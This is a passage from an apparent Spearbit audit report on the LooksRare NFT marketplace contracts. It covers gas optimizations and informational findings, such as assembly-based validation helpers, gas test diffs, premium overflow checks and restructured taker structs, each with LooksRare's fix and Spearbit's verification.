+            if (hasUserApprovedOperator[msg.sender][operator]) {
                 revert AlreadyApproved();
             }
-            hasUserApprovedOperator[msg.sender][operators[i]] = true;
+            hasUserApprovedOperator[msg.sender][operator] = true;
             unchecked {
                 ++i;
@@ -205,11 +206,12 @@ contract TransferManager is ITransferManager, LowLevelERC721Transfer, LowLevelER
         for (uint256 i; i < length; ) {
-            if (!hasUserApprovedOperator[msg.sender][operators[i]]) {
+            address operator = operators[i];
+            if (!hasUserApprovedOperator[msg.sender][operator]) {
                 revert NotApproved();
             }
-            delete hasUserApprovedOperator[msg.sender][operators[i]];
+            delete hasUserApprovedOperator[msg.sender][operator];
             unchecked {
                 ++i;
             }

testUserCannotGrantApprovalsIfNotWhitelisted() (gas: -1 (-0.008%))
testUserCannotRevokeApprovalsIfNotApproved() (gas: 2 (0.017%))
testCannotExecuteTransactionIfMakerBidWithStrategyForMakerAsk() (gas: -884 (-0.039%))
testCannotExecuteTransactionIfMakerAskWithStrategyForMakerBid() (gas: -884 (-0.039%))
testExecuteMultipleTakerBidsReentrancy() (gas: -442 (-0.040%))
testTakerBidReentrancy() (gas: -442 (-0.043%))
testTakerAskReentrancy() (gas: -442 (-0.044%))
testMultipleTakerBidsERC721WithAffiliateButWithoutRoyalty() (gas: -884 (-0.060%))
testTakerAskCollectionOrderWithMerkleTreeERC721() (gas: -884 (-0.069%))
testCannotExecuteAnotherOrderAtNonceIfExecutionIsInProgress() (gas: -884 (-0.070%))
testTokenIdsRangeERC721() (gas: -884 (-0.070%))
testMakerBidItemIdsLengthIsNotTwo() (gas: -884 (-0.072%))
testTakerAskCannotExecuteWithWrongProof(uint256) (gas: -884 (-0.074%))
testTakerAskRevertIfAmountIsZeroOrGreaterThanOneERC721() (gas: -884 (-0.074%))
testMakerBidItemIdsLowerBandHigherThanOrEqualToUpperBand() (gas: -884 (-0.074%))
testWrongAmounts() (gas: -884 (-0.075%))
testDutchAuction(uint256) (gas: -884 (-0.076%))
testTokenIdsRangeERC1155() (gas: -884 (-0.076%))
testTakerAskPriceTooHigh() (gas: -884 (-0.076%))
testTakerAskUnsortedItemIds() (gas: -884 (-0.076%))
testTakerAskDuplicatedItemIds() (gas: -884 (-0.076%))
testTakerAskOfferedAmountNotEqualToDesiredAmount() (gas: -884 (-0.076%))
testMakerBidAmountLengthIsNotOne() (gas: -884 (-0.077%))
testInactiveStrategy() (gas: -884 (-0.077%))
testInactiveStrategy() (gas: -884 (-0.079%))
testTakerBidTooLow(uint256) (gas: -884 (-0.080%))
testItemIdsMismatch() (gas: -884 (-0.081%))
testStartPriceTooLow() (gas: -884 (-0.081%))
testItemIdsAndAmountsLengthMismatch() (gas: -884 (-0.081%))
testInactiveStrategy() (gas: -884 (-0.081%))
testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -884 (-0.082%))
testThreeTakerBidsERC721OneFails() (gas: -884 (-0.085%))
testZeroItemIdsLength() (gas: -884 (-0.085%))
testMultiFill() (gas: -1326 (-0.086%))
testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -884 (-0.088%))
testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -884 (-0.090%))
testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -884 (-0.096%))
testCreatorRebatesArePaidForRoyaltyFeeManagerWithBundles() (gas: -884 (-0.107%))
testCreatorRoyaltiesGetPaidForRoyaltyFeeManagerWithBundles() (gas: -884 (-0.107%))
testTakerBidERC721BundleWithRoyaltiesFromRegistry() (gas: -884 (-0.114%))
testThreeTakerBidsERC721() (gas: -884 (-0.114%))
testTakerAskERC721BundleWithRoyaltiesFromRegistry() (gas: -884 (-0.115%))
testCreatorRoyaltiesRevertIfFeeHigherThanLimit() (gas: -884 (-0.121%))
testWrongAmounts() (gas: -884 (-0.121%))
testTakerAskERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -884 (-0.125%))
testTakerBidERC721BundleNoRoyalties() (gas: -884 (-0.127%))
testTakerBidERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -884 (-0.127%))
testTakerAskERC721BundleNoRoyalties() (gas: -884 (-0.128%))
testTakerBidERC721WithRoyaltiesFromRegistry(uint256) (gas: -904 (-0.130%))
testCannotExecuteAnOrderTwice() (gas: -884 (-0.130%))
testCreatorRoyaltiesGetPaidForRoyaltyFeeManager() (gas: -884 (-0.131%))
testCreatorRebatesArePaidForRoyaltyFeeManager() (gas: -884 (-0.131%))
testTakerBidERC721WithAffiliateButWithoutRoyalty() (gas: -884 (-0.132%))
testTakerAskERC721WithAffiliateButWithoutRoyalty() (gas: -884 (-0.134%))
testTakerAskERC721WithRoyaltiesFromRegistry(uint256) (gas: -924 (-0.135%))
testCreatorRoyaltiesGetPaidForERC2981() (gas: -884 (-0.135%))
testCreatorRebatesArePaidForERC2981() (gas: -884 (-0.136%))
testCannotExecuteMultipleTakerBidsIfDifferentCurrencies() (gas: -884 (-0.141%))
testTakerBidERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -884 (-0.144%))
testCannotExecuteAnOrderWhoseNonceIsCancelled() (gas: -884 (-0.145%))
testTakerAskCollectionOrderERC721(uint256) (gas: -884 (-0.146%))
testCannotTradeIfWrongAmounts() (gas: -884 (-0.146%))
testTakerAskERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -884 (-0.148%))
testAmountsMismatch() (gas: -884 (-0.154%))
testItemIdsLengthNotOne() (gas: -884 (-0.154%))
testAmountsLengthNotOne() (gas: -884 (-0.155%))
testCannotTradeIfWrongCurrency() (gas: -884 (-0.161%))
testTransferBatchItemsAcrossCollectionERC721AndERC1155() (gas: -442 (-0.168%))
testCannotTransferIfNoManagerSelectorForAssetType() (gas: -884 (-0.171%))
testZeroAmount() (gas: -884 (-0.181%))
testBidAskAmountMismatch() (gas: -884 (-0.184%))
testPriceMismatch() (gas: -884 (-0.185%))
testCannotTradeIfDomainSeparatorHasBeenUpdated() (gas: -884 (-0.189%))
testTransferBatchItemsAcrossCollectionPerCollectionAmountsAndItemIdsLengthMismatch() (gas: -442 (-0.190%))
testTransferBatchItemsAcrossCollectionPerCollectionItemIdsLengthZero() (gas: -442 (-0.191%))
testCannotTradeIfChainIdHasChanged() (gas: -884 (-0.196%))
testTransferBatchItemsSameERC721() (gas: -442 (-0.201%))
testThreeTakerBidsERC721WrongLengths() (gas: -884 (-0.204%))
testCannotCallRestrictedExecuteTakerBid() (gas: -884 (-0.207%))
testTransferBatchItemsSameERC1155() (gas: -442 (-0.221%))
testTransferSingleItemERC721() (gas: -442 (-0.237%))
testTransferSingleItemERC1155() (gas: -442 (-0.266%))
testTransferBatchItemsAcrossCollectionWrongAssetTypesLength() (gas: -442 (-0.334%))
testTransferBatchItemsAcrossCollectionWrongAmountsLength() (gas: -442 (-0.336%))
testTransferBatchItemsAcrossCollectionWrongItemIdsLength() (gas: -442 (-0.336%))
testTransferBatchItemsAcrossCollectionZeroCollectionsLength() (gas: -442 (-0.336%))
testCannotBatchTransferIfAssetTypeIsNotZeroOrOne() (gas: -442 (-0.336%))
testUserCannotGrantApprovalsIfAlreadyApproved() (gas: -659 (-0.515%))
testCannotBatchTransferIfOperatorApprovalsRevoked() (gas: -1095 (-0.735%))
testCannotTransferERC1155IfOperatorApprovalsRevokedByUserOrOperatorRemovedByOwner() (gas: -1095 (-0.766%))
testCannotTransferERC721IfOperatorApprovalsRevokedByUserOrOperatorRemovedByOwner() (gas: -1095 (-0.767%))
Overall gas change: -72955 (-13.980%)

LooksRare: Fixed in PR 316.
Spearbit: Verified.

+5.4.6 recipients[0] is never used
Severity: Gas Optimization
Context:
• ExecutionManager.sol#L169
• ExecutionManager.sol#L255
• LooksRareProtocol.sol#L452
Description: recipients[0] is set to protocolFeeRecipient, but its value is never used afterward. In _payProtocolFeeAndAffiliateFee, the fees[0] amount is manually distributed to an affiliate (if any) and the protocolFeeRecipient.
Recommendation: recipients can be made into an address[2] array (by removing the element corresponding to protocolFeeRecipient), and the fees elements can be rearranged so that fees[2] corresponds to the fee directed to the protocol and an affiliate.
LooksRare: Fixed in PR 314 and PR 371. The order of fungible token transfers has been swapped: the seller is paid first, then the creator.
Spearbit: Verified.

+5.4.7 currency validation can be optimized/refactored
Severity: Gas Optimization
Context:
• StrategyUSDDynamicAsk.sol#L86-L90
• StrategyUSDDynamicAsk.sol#L163-L167
• StrategyFloorFromChainlink.sol#L62-L66
• StrategyFloorFromChainlink.sol#L116-L120
Description: In the contexts above we are enforcing that only the native token or WETH can be supplied. The if statement can be simplified and refactored into a utility function (possibly defined in either BaseStrategy or in BaseStrategyChainlinkPriceLatency):

if (makerAsk.currency != address(0)) {
    if (makerAsk.currency != WETH) {
        revert WrongCurrency();
    }
}

Recommendation: Refactor and simplify:

/*
 * error WrongCurrency()
 *
 * Memory layout:
 * - 0x00: Left-padded selector (data begins at 0x1c)
 * Revert buffer is memory[0x1c:0x20]
 */
uint256 constant WrongCurrency_error_selector = 0x164fb6c2;
uint256 constant WrongCurrency_error_length = 0x04;
uint256 constant Error_selector_offset = 0x1c;

function _allowNativeOrSupplied(address currency, address supplied) internal pure {
    assembly {
        if mul(currency, iszero(eq(currency, supplied))) {
            mstore(0x00, WrongCurrency_error_selector)
            revert(Error_selector_offset, WrongCurrency_error_length)
        }
    }
}

Note: _allowNativeOrSupplied takes into consideration potential dirty bytes of currency and supplied.
LooksRare: Fixed in PR 306.
Spearbit: Verified.
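A short usage sketch for the refactored helper above (the call site shown is an assumption based on the strategies named in the Context of 5.4.7):

// Sketch: each strategy's currency validation collapses to a single call;
// this reverts with WrongCurrency() unless currency is address(0) or WETH.
_allowNativeOrSupplied(makerAsk.currency, WETH);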
+5.4.8 validating amount can be simplified and possibly refactored
Severity: Gas Optimization
Context:
• InheritedStrategy.sol#L113-L120
• StrategyCollectionOffer.sol#L56-L63
• StrategyCollectionOffer.sol#L97-L104
• StrategyDutchAuction.sol#L43-L50
• StrategyItemIdsRange.sol#L62-L69
• StrategyUSDDynamicAsk.sol#L72-L79
and:
• StrategyUSDDynamicAsk.sol#L149-L156
• StrategyDutchAuction.sol#L108-L115
Description: In the contexts above, we are trying to invalidate orders that have 0 amounts, or an amount other than 1 when the asset is an ERC721:

if (amount != 1) {
    if (amount == 0) {
        revert OrderInvalid();
    }
    if (assetType == 0) {
        revert OrderInvalid();
    }
}

The above snippet can be simplified into:

if (amount == 0 || (amount != 1 && assetType == 0)) {
    revert OrderInvalid();
}

Recommendation: It is suggested to use the above simplified version or even an assembly block:

/*
 * error OrderInvalid()
 *
 * Memory layout:
 * - 0x00: Left-padded selector (data begins at 0x1c)
 * Revert buffer is memory[0x1c:0x20]
 */
uint256 constant OrderInvalid_error_selector = 0x2e0c0f71;
uint256 constant OrderInvalid_error_length = 0x04;
uint256 constant Error_selector_offset = 0x1c;

...

assembly {
    let invalidOrder := or(
        iszero(amount),
        and(xor(amount, 1), iszero(assetType))
    )
    if invalidOrder {
        mstore(0x00, OrderInvalid_error_selector)
        revert(Error_selector_offset, OrderInvalid_error_length)
    }
}

It would also be great to refactor these validations into a utility function that can be used across the board:

function _validateAmount(uint256 amount, uint256 assetType) internal pure {
    assembly {
        let invalidOrder := or(
            iszero(amount),
            and(xor(amount, 1), iszero(assetType))
        )
        if invalidOrder {
            mstore(0x00, OrderInvalid_error_selector)
            revert(Error_selector_offset, OrderInvalid_error_length)
        }
    }
}

For the special cases:
• StrategyUSDDynamicAsk.sol#L149-L156
• StrategyDutchAuction.sol#L108-L115
we would need to return instead of revert.
LooksRare: Fixed in PR 305 and PR 364.
Spearbit: Verified.

+5.4.9 _verifyMatchingItemIdsAndAmountsAndPrice can be further optimized
Severity: Gas Optimization
Context:
• InheritedStrategy.sol#L59
Description: _verifyMatchingItemIdsAndAmountsAndPrice's validation logic uses more opcodes than is necessary. Also, the whole function can be turned into an assembly block to further optimize it.
+5.4.9 _verifyMatchingItemIdsAndAmountsAndPrice can be further optimized
Severity: Gas Optimization
Context:
• InheritedStrategy.sol#L59
Description: _verifyMatchingItemIdsAndAmountsAndPrice's validation logic uses more opcodes than is necessary. Also, the whole function can be turned into an assembly block to optimize it further.

Examples of simplifications for if conditions:

or(X, gt(Y, 0))
or(X, Y)         // simplified version

or(X, iszero(eq(Y, Z)))
or(X, xor(Y, Z)) // simplified version

The nested if block below:

if (amount != 1) {
    if (amount == 0) {
        revert OrderInvalid();
    }
    if (assetType == 0) {
        revert OrderInvalid();
    }
}

can be simplified into:

if (amount == 0) {
    revert OrderInvalid();
}
if ((amount != 1) && (assetType == 0)) {
    revert OrderInvalid();
}

Recommendation: Here is a sketch of a low-level implementation that includes the optimization and also utilizes inline assembly further:

/*
 * error OrderInvalid()
 *
 * Memory layout:
 * - 0x00: Left-padded selector (data begins at 0x1c)
 * Revert buffer is memory[0x1c:0x20]
 */
uint256 constant OrderInvalid_error_selector = 0x2e0c0f71;
uint256 constant OrderInvalid_error_length = 0x04;
uint256 constant Error_selector_offset = 0x1c;
uint256 constant OneWord = 0x20;

function _verifyMatchingItemIdsAndAmountsAndPrice(
    uint256 assetType,
    uint256[] calldata amounts,
    uint256[] calldata counterpartyAmounts,
    uint256[] calldata itemIds,
    uint256[] calldata counterpartyItemIds,
    uint256 price,
    uint256 counterpartyPrice
) private pure {
    assembly {
        let end
        {
            /*
             * if (
             *     amountsLength == 0 ||
             *     // If A == B, then A XOR B == 0. So if all 4 are equal, it should be 0 | 0 | 0 == 0
             *     ((amountsLength ^ itemIdsLength) |
             *      (amountsLength ^ counterpartyAmountsLength) |
             *      (amountsLength ^ counterpartyItemIdsLength)) != 0 ||
             *     price != counterpartyPrice
             * ) {
             *     revert OrderInvalid();
             * }
             */
            let amountsLength := amounts.length
            let itemIdsLength := itemIds.length
            let counterpartyAmountsLength := counterpartyAmounts.length
            let counterpartyItemIdsLength := counterpartyItemIds.length

            if or(
                or(iszero(amountsLength), xor(price, counterpartyPrice)),
                or(
                    or(
                        xor(amountsLength, itemIdsLength),
                        xor(amountsLength, counterpartyAmountsLength)
                    ),
                    xor(amountsLength, counterpartyItemIdsLength)
                )
            ) {
                mstore(0x00, OrderInvalid_error_selector)
                revert(Error_selector_offset, OrderInvalid_error_length)
            }

            end := shl(5, amountsLength)
        }

        let _assetType := assetType
        let amountsOffset := amounts.offset
        let itemIdsOffset := itemIds.offset
        let counterpartyAmountsOffset := counterpartyAmounts.offset
        let counterpartyItemIdsOffset := counterpartyItemIds.offset

        for {} end {} {
            end := sub(end, OneWord)

            let amount := calldataload(add(amountsOffset, end))
            let invalidOrder
            {
                let itemId := calldataload(add(itemIdsOffset, end))
                let counterpartyAmount := calldataload(add(counterpartyAmountsOffset, end))
                let counterpartyItemId := calldataload(add(counterpartyItemIdsOffset, end))
                invalidOrder := or(
                    xor(amount, counterpartyAmount),
                    xor(itemId, counterpartyItemId)
                )
            }

            invalidOrder := or(
                invalidOrder,
                or(
                    iszero(amount),
                    and(xor(amount, 1), iszero(_assetType))
                )
            )

            if invalidOrder {
                mstore(0x00, OrderInvalid_error_selector)
                revert(Error_selector_offset, OrderInvalid_error_length)
            }
        }
    }
}

testTakerBidMultipleOrdersSignedERC721() (gas: -123 (-0.000%))
testTakerAskMultipleOrdersSignedERC721() (gas: -123 (-0.000%))
testPriceMismatch() (gas: -6 (-0.001%))
testBidAskAmountMismatch() (gas: -16 (-0.003%))
testCannotValidateOrderIfWrongFormat() (gas: -72 (-0.012%))
testTakerAskERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -123 (-0.017%))
testTakerBidERC721WithRoyaltiesFromRegistry(uint256) (gas: -123 (-0.018%))
testTakerBidERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -123 (-0.018%))
testTakerAskERC721WithRoyaltiesFromRegistry(uint256) (gas: -123 (-0.018%))
testCannotExecuteAnOrderTwice() (gas: -123 (-0.018%))
testCreatorRoyaltiesGetPaidForRoyaltyFeeManager() (gas: -123 (-0.018%))
testCreatorRebatesArePaidForRoyaltyFeeManager() (gas: -123 (-0.018%))
testTakerBidERC721WithAffiliateButWithoutRoyalty() (gas: -123 (-0.018%))
testTakerAskERC721WithAffiliateButWithoutRoyalty() (gas: -123 (-0.019%))
testCreatorRoyaltiesGetPaidForERC2981() (gas: -123 (-0.019%))
testCreatorRebatesArePaidForERC2981() (gas: -123 (-0.019%))
testCannotExecuteMultipleTakerBidsIfDifferentCurrencies() (gas: -123 (-0.020%))
testTakerBidERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -123 (-0.020%))
testTakerAskERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -123 (-0.021%))
testCannotTransferIfNoManagerSelectorForAssetType() (gas: -123 (-0.024%))
testCreatorRoyaltiesRevertIfFeeHigherThanLimit() (gas: -246 (-0.034%))
testTakerBidGasGriefing() (gas: -123 (-0.038%))
testThreeTakerBidsERC721() (gas: -369 (-0.048%))
testCannotTradeIfWrongAmounts() (gas: -365 (-0.060%))
testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -691 (-0.064%))
testMultipleTakerBidsERC721WithAffiliateButWithoutRoyalty() (gas: -984 (-0.067%))
testTakerBidCannotTransferSandboxWithERC721AssetTypeButERC1155AssetTypeWorks() (gas: -246 (-0.068%))
testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -691 (-0.069%))
testTakerAskCannotTransferSandboxWithERC721AssetTypeButERC1155AssetTypeWorks() (gas: -246 (-0.069%))
testThreeTakerBidsERC721OneFails() (gas: -738 (-0.071%))
testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -691 (-0.075%))
testThreeTakerBidsGasGriefing() (gas: -369 (-0.075%))
testCreatorRebatesArePaidForRoyaltyFeeManagerWithBundles() (gas: -691 (-0.084%))
testCreatorRoyaltiesGetPaidForRoyaltyFeeManagerWithBundles() (gas: -691 (-0.084%))
testTakerBidERC721BundleWithRoyaltiesFromRegistry() (gas: -691 (-0.089%))
testTakerAskERC721BundleWithRoyaltiesFromRegistry() (gas: -691 (-0.090%))
testTakerBidERC721BundleNoRoyalties() (gas: -691 (-0.099%))
testTakerAskERC721BundleNoRoyalties() (gas: -691 (-0.100%))
testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -1382 (-0.140%))
Overall gas change: -13472 (-1.724%)

Warning: If the above implementation gets included, it is highly recommended to also include unit and differential tests against a high-level implementation.
LooksRare: Fixed in PR 299.
Spearbit: Verified.

5.5 Informational

+5.5.1 In StrategyFloorFromChainlink, premium amounts miss the checks that exist for discount amounts
Severity: Informational
Context:
• StrategyFloorFromChainlink.sol#L79-L80
• StrategyFloorFromChainlink.sol#L133-L134
• StrategyFloorFromChainlink.sol#L184-L191
• StrategyFloorFromChainlink.sol#L241-L249
Description: For discount amounts, StrategyFloorFromChainlink has custom checks for underflows (even though they would be caught by the compiler):

if (floorPrice <= discountAmount) {
    revert DiscountGreaterThanFloorPrice();
}
uint256 desiredPrice = floorPrice - discountAmount;
...
// @dev Discount cannot be 100%
if (discount >= 10_000) {
    revert OrderInvalid();
}
uint256 desiredPrice = (floorPrice * (10_000 - discount)) / 10_000;

Similar checks for overflows of the premium are missing in the execution and validation endpoints (even though they would be caught by the compiler, floorPrice + premium or 10_000 + premium might overflow).
Recommendation: Either document/comment why the checks are present for discount and missing for premium, or implement similar ones for premium.
The simplest method to recognize whether a sum overflows is to use an assembly block:

function sumOverflows(uint256 a, uint256 b) internal pure returns (bool overflows) {
    assembly {
        overflows := lt(add(a, b), a)
    }
}

Note that solc also performs a similar check when addition is used in a block that is not unchecked:

// YUL
function checked_add_t_uint256(x, y) -> sum {
    x := cleanup_t_uint256(x)
    y := cleanup_t_uint256(y)
    sum := add(x, y)
    if gt(x, sum) { panic_error_0xXX() }
}

LooksRare: Only comments have been added to emphasize that custom overflow checks for premiums are not implemented. See PR 366.
Spearbit: Verified.

+5.5.2 StrategyFloorFromChainlink's isMakerBidValid compares the time-dependent floorPrice to a fixed discount
Severity: Informational
Context:
• StrategyFloorFromChainlink.sol#L313
Description: When isMakerBidValid gets called, the comparison between the floorPrice (which depends on the market conditions at that specific time) and the fixed discount might cause this function to return isValid as either true or false.
Recommendation: The above issue needs to be documented for the users/makers so that they are aware that the validation performed by isMakerBidValid is time-dependent. This is also true when one checks the health of a price feed (positivity and freshness of the answer) for both the Chainlink floor price and USD strategies.
LooksRare: Documented in PR 370.
Spearbit: Verified.

+5.5.3 StrategyFloorFromChainlink's isMakerAskValid does not validate makerAsk.additionalParameters
Severity: Informational
Context:
• StrategyFloorFromChainlink.sol#L79
• StrategyFloorFromChainlink.sol#L133
Description: For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid, the maker needs to make sure to populate its additionalParameters with the premium amount, otherwise the taker's transactions would revert:

makerAsk.additionalParameters = abi.encode(premium);

isMakerAskValid does not check whether makerAsk.additionalParameters has 32 as its length. For example, the validation endpoint for StrategyCollectionOffer does check this for the merkle root.
Recommendation: In isMakerAskValid, check whether makerAsk.additionalParameters.length == 32; if not, set isValid to false and return a custom error selector.
LooksRare: Implemented recommendation in PR 365.
Spearbit: Verified.
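A minimal sketch of the recommended check (assuming the existing isValid/errorSelector return convention; the custom error name is hypothetical):

error WrongAdditionalParametersLength(); // hypothetical custom error

// Inside isMakerAskValid, after the existing selector/currency/itemIds checks:
// the premium is abi.encode'd as a single uint256, so additionalParameters
// must be exactly 32 bytes; anything else would make the taker's execution
// revert on abi.decode.
if (makerAsk.additionalParameters.length != 32) {
    return (false, WrongAdditionalParametersLength.selector);
}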
+5.5.4 StrategyFloorFromChainlink strategies do not check for asset types explicitly
Severity: Informational
Context:
• StrategyFloorFromChainlink.sol#L54
• StrategyFloorFromChainlink.sol#L108
• StrategyFloorFromChainlink.sol#L162
• StrategyFloorFromChainlink.sol#L219
• StrategyCollectionOffer.sol#L32
• StrategyCollectionOffer.sol#L73
Description: StrategyFloorFromChainlink has 4 different execution endpoints:
• executeFixedPremiumStrategyWithTakerBid
• executeBasisPointsPremiumStrategyWithTakerBid
• executeFixedDiscountCollectionOfferStrategyWithTakerAsk
• executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk
All these endpoints require that only one amount be passed (asked for or bid on) and that this amount be 1. This is in contrast to the StrategyCollectionOffer strategy, which allows an arbitrary amount (although it is also required to be only one amount).
Currently, Chainlink only provides price feeds for a selected list of ERC721 collections: https://docs.chain.link/data-feeds/nft-floor-price/addresses
So, if there are no price feeds for ERC1155 (as of now), the transaction would revert. Thus, one can implicitly deduce that the Chainlink floor strategies are only implemented for ERC721 tokens.
Other strategies condition the amounts based on the assetType:
• assetType == 0, i.e. ERC721 collections, can only have 1 as a valid amount
• assetType == 1, i.e. ERC1155 collections, can only have a non-zero number as a valid amount
If in the future Chainlink or another token price feed adds support for some ERC1155 collections, one cannot use the current floor strategies to fulfill an order with an amount greater than 1.
Recommendation: Either document/comment (in NatSpec) that StrategyFloorFromChainlink is meant to be used for ERC721 tokens, in which case the strategy execution and validation endpoints should perhaps revert if assetType is non-zero. Or, to future-proof and unify the amount validation with other strategies, condition the allowed amounts on the asset type like above (see the example or the suggested implementation in https://github.com/spearbit-audits/review-looksrare/issues/12).
LooksRare: Comments added in PR 355.
Spearbit: Verified.
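For illustration, a sketch of the first option's explicit guard (hedged; it assumes, as elsewhere in this report, that the maker struct carries an assetType field where 0 denotes ERC721):

// In the Chainlink floor strategy execution/validation endpoints:
if (makerAsk.assetType != 0) {
    // These strategies are only meaningful for ERC721 until floor price
    // feeds exist for ERC1155 collections.
    revert OrderInvalid();
}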
+5.5.5 itemIds and amounts are redundant fields for takerXxx struct
Severity: Informational
Context:
• OrderStructs.sol#L133-L134
• OrderStructs.sol#L116-L117
Description: The taker is the entity that initiates the calls to LooksRareProtocol's 3 order execution endpoints. Most implemented strategies (which are fixed/chosen by the maker through signing the makerXxx struct, which includes the strategyId) require the itemIds and amounts fields of the maker and the taker to mirror each other.
• M_i^j: the j-th element of the maker's itemIds field (the struct would be either MakerBid or MakerAsk depending on the context)
• M_a^j: the j-th element of the maker's amounts field (the struct would be either MakerBid or MakerAsk depending on the context)
• T_i^j: the j-th element of the taker's itemIds field (the struct would be either TakerBid or TakerAsk depending on the context)
• T_a^j: the j-th element of the taker's amounts field (the struct would be either TakerBid or TakerAsk depending on the context)
Borrowing notation also from "Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies":
• InheritedStrategy: T_i^j = M_i^j, T_a^j = M_a^j
• StrategyDutchAuction: T_i^j = M_i^j, T_a^j = M_a^j; the taker can send extra itemIds and amounts, but they won't be used.
• StrategyUSDDynamicAsk: T_i^j = M_i^j, T_a^j = M_a^j; the taker can send extra itemIds and amounts, but they won't be used.
• StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid: T_i^0 = M_i^0, T_a^0 = M_a^0 = 1; the taker can send extra itemIds and amounts, but they won't be used.
• StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk: T_a^0 = M_a^0 = 1; the maker's itemIds are unused.
• StrategyCollectionOffer: T_a^0 = M_a^0; the maker's itemIds are unused, and the taker's T_a^i for i > 0 are also unused.
• StrategyItemIdsRange: M_i^0 <= T_i^j <= M_i^1, sum of T_a^j = M_a^0.
For:
• InheritedStrategy
• StrategyDutchAuction
• StrategyUSDDynamicAsk
• StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid
the taker's itemIds and amounts are redundant, as they should exactly match the maker's fields. For the other strategies, one can encode the required parameters in either the maker's or the taker's additionalParameters fields.
Recommendation: Redefine TakerAsk and TakerBid as:

struct TakerAsk {
    address recipient;
    uint256 minPrice;
    bytes additionalParameters;
}

struct TakerBid {
    address recipient;
    uint256 maxPrice;
    bytes additionalParameters;
}

For StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk and StrategyCollectionOffer.executeCollectionStrategyWithTakerAsk, encode takerAsk.additionalParameters as:

takerAsk.additionalParameters = abi.encode(offeredItemId); // makerBid.itemIds will be unused

For StrategyCollectionOffer.executeCollectionStrategyWithTakerAskWithProof, encode takerAsk.additionalParameters as:

takerAsk.additionalParameters = abi.encode(offeredItemId, proof); // makerBid.itemIds will be unused

For StrategyItemIdsRange, encode takerAsk.additionalParameters and makerBid.additionalParameters as:

takerAsk.additionalParameters = abi.encode(offeredItems); // if implementing issues/56
// or
takerAsk.additionalParameters = abi.encode(offeredItemIds, offeredAmounts);

makerBid.additionalParameters = abi.encode(desiredAmount, minItemId, maxItemId);

For this strategy, the maker can leave the itemIds and amounts fields empty. Implementing this recommendation would remove the necessity of all the checks that ensure the mirroring structures.
LooksRare: Fix implemented in PR 353, PR 373 and PR 383. TakerBid and TakerAsk are merged into:

struct Taker {
    address recipient;
    bytes additionalParameters;
}

Any extra parameter for a strategy is encoded in additionalParameters.
Spearbit: Verified.

+5.5.6 discount == 10_000 is not allowed in executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk
Severity: Informational
Context:
• StrategyFloorFromChainlink.sol#L242
• StrategyFloorFromChainlink.sol#L249
• StrategyFloorFromChainlink.sol#L244-L247
Description: executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk reverts if discount == 10_000, but does not revert for discount == 9_999, which has almost the same effect. Note that if discount == 10_000 (setting the revert aside), price = desiredPrice = 0. So, unless the taker (the sender of the transaction) has set its takerAsk.minPrice to 0 (the maker is bidding for a 100% discount and the taker is gifting the NFT), the transaction would revert:

if (takerAsk.minPrice > price) { // takerAsk.minPrice > 0
    revert AskTooHigh();
}

Recommendation: Document why discount == 10_000 is not allowed.
• Option 1: If it is decided to allow a 100% discount on the floor price, then one can simplify the code so that instead of storing discount in makerBid.additionalParameters, we store 10_000 - discount and call it desiredPriceRatioInBPS:

uint256 desiredPriceRatioInBPS = abi.decode(makerBid.additionalParameters, (uint256));
if (desiredPriceRatioInBPS > 10_000) {
    revert OrderInvalid();
}
uint256 desiredPrice = (floorPrice * desiredPriceRatioInBPS) / 10_000; // <-- saves a subtraction

• Option 2: If we do not want discount to get close to 10_000, perhaps as an alternative we can introduce a stricter upper bound for it.
Note: A similar discussion applies to floorPrice <= discountAmount in executeFixedDiscountCollectionOfferStrategyWithTakerAsk.
LooksRare: Allowing discount to be 100% in PR 368. We think it is best not to pursue Option 1 even though it saves a subtraction. It is more readable/consistent to use the name discount for both the fixed and basis-points discounts than to use discount for the fixed discount and a desired ratio for the basis-points discount. If we were to use desiredPriceRatioInBPS, we would have to do the same for the premium and validate the premium to be greater than 10,000.
Spearbit: Verified.
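To see why 9_999 basis points is effectively a full discount, a quick worked example (a sketch; the helper name and numbers are illustrative only):

function basisPointsDiscountPrice(uint256 floorPrice, uint256 discount) internal pure returns (uint256) {
    return (floorPrice * (10_000 - discount)) / 10_000;
}

// basisPointsDiscountPrice(1 ether, 9_999) == 1e14 wei (0.0001 ETH):
// an allowed, dust-sized price, while discount == 10_000 (price 0) reverts.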
+5.5.7 Restructure executeMultipleTakerBids's input parameters
Severity: Informational
Context:
• LooksRareProtocol.sol#L166
• LooksRareProtocol.sol#L175-L180
Description: executeMultipleTakerBids has the following form:

function executeMultipleTakerBids(
    OrderStructs.TakerBid[] calldata takerBids,
    OrderStructs.MakerAsk[] calldata makerAsks,
    bytes[] calldata makerSignatures,
    OrderStructs.MerkleTree[] calldata merkleTrees,
    address affiliate,
    bool isAtomic
)

For the input parameters provided, we need to make sure takerBids, makerAsks, makerSignatures, and merkleTrees all have the same length. We can enforce this requirement by definition if we restructure the input passed to executeMultipleTakerBids.
Recommendation: Define a new struct:

struct BidOrder {
    TakerBid takerBid;
    MakerAsk makerAsk;
    bytes makerSignature;
